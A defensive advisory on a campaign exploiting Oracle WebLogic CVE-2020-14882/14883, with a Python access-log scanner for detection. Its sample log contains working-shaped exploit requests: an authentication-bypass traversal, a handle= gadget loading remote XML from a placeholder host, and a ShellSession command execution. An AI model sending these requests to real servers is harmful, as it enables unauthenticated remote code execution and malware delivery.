What is the Attack?

An attack campaign attributed to the 8220 gang has been observed exploiting two three-year-old Oracle WebLogic Server vulnerabilities, CVE-2020-14883 (commonly chained with the authentication bypass CVE-2020-14882), to deliver malware. The attackers cause the vulnerable server to fetch and process maliciously crafted XML files, which leads to remote code execution, and then deploy stealer and cryptominer malware such as AgentTesla, rhajk, and nasqa. The high IPS detection rate suggests that exploitation is widespread.
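As an added example (not code from the FortiGuard report), the following Python scans web-server access-log lines for the publicly documented request shape of this chain: a double-URL-encoded path traversal from an unauthenticated console resource into console.portal (CVE-2020-14882), followed by a handle= parameter naming one of the Spring or Coherence classes used for CVE-2020-14883 to load attacker-hosted XML. The log lines, IP addresses, timestamps and payload URL are constructed for the example, and the function names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the original report). The request
# targets mimic the publicly documented CVE-2020-14882/14883 exploitation pattern.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [01/Jun/2023:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1234',
    '203.0.113.5 - - [01/Jun/2023:10:00:02 +0000] "GET /console/css/%252e%252e%252fconsole.portal'
    '?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.'
    'FileSystemXmlApplicationContext(%22http://198.51.100.7/payload.xml%22) HTTP/1.1" 200 567',
    '198.51.100.9 - - [01/Jun/2023:10:00:03 +0000] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 567',
    '203.0.113.6 - - [01/Jun/2023:10:00:04 +0000] "GET /console/images/%252E%252E%252Fconsole.portal'
    '?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession'
    '(%22java.lang.Runtime.getRuntime().exec(%27id%27)%22) HTTP/1.1" 200 567',
    '192.0.2.1 - - [01/Jun/2023:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 89',
])

# Common/combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Gadget classes publicly documented for CVE-2020-14883 (passed via handle=).
RCE_HANDLES = (
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
    "com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext",
    "com.tangosol.coherence.mvel2.sh.ShellSession",
)


def full_decode(s, rounds=3):
    """Undo repeated percent-encoding (the traversal is typically double-encoded)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze_request(target):
    """Return (list of CVE indicators, remote XML URL or None) for one request target."""
    parts = urlsplit(target)
    path = full_decode(parts.path)
    cves = []
    # CVE-2020-14882: '..' traversal from a static console path (css/, images/)
    # into console.portal, which skips the console's authentication.
    low = path.lower()
    if low.startswith("/console/") and ".." in path and low.endswith("console.portal"):
        cves.append("CVE-2020-14882")
    # CVE-2020-14883: handle= instantiates a class that loads remote XML or runs code.
    handle = full_decode(parse_qs(parts.query).get("handle", [""])[0])
    remote_xml = None
    if any(handle.startswith(cls) for cls in RCE_HANDLES):
        cves.append("CVE-2020-14883")
        m = re.search(r'https?://[^"\')\s]+', handle)
        if m:
            remote_xml = m.group(0)  # attacker-hosted XML worth blocking/retrieving for analysis
    return cves, remote_xml


def scan_log(text):
    """Return one finding per log line that carries an exploitation indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        cves, remote_xml = analyze_request(m.group("target"))
        if cves:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "cves": cves,
                "remote_xml": remote_xml,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Matches on CVE-2020-14882 alone are worth alerting on even without a handle= parameter, since the traversal is the step that turns an exposed console into an unauthenticated target; the remote XML URL, when present, is the same kind of indicator the IPS and antivirus coverage below keys on.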

What is the Vendor Solution?

Oracle released fixes for both vulnerabilities in the October 2020 Critical Patch Update: https://www.oracle.com/security-alerts/cpuoct2020traditional.html.

What FortiGuard Coverage is available?

FortiGuard Labs has had an IPS signature in place since November 2020, “Oracle.WebLogic.Fusion.Middleware.Authentication.Bypass” (default action set to “block”), covering CVE-2020-14883 and CVE-2020-14882, and has released antivirus signatures for the known malware related to this campaign.

FortiGuard Labs recommends that organizations scan their environments, identify the versions of vulnerable software in use, develop an upgrade plan for them, and always follow best practices.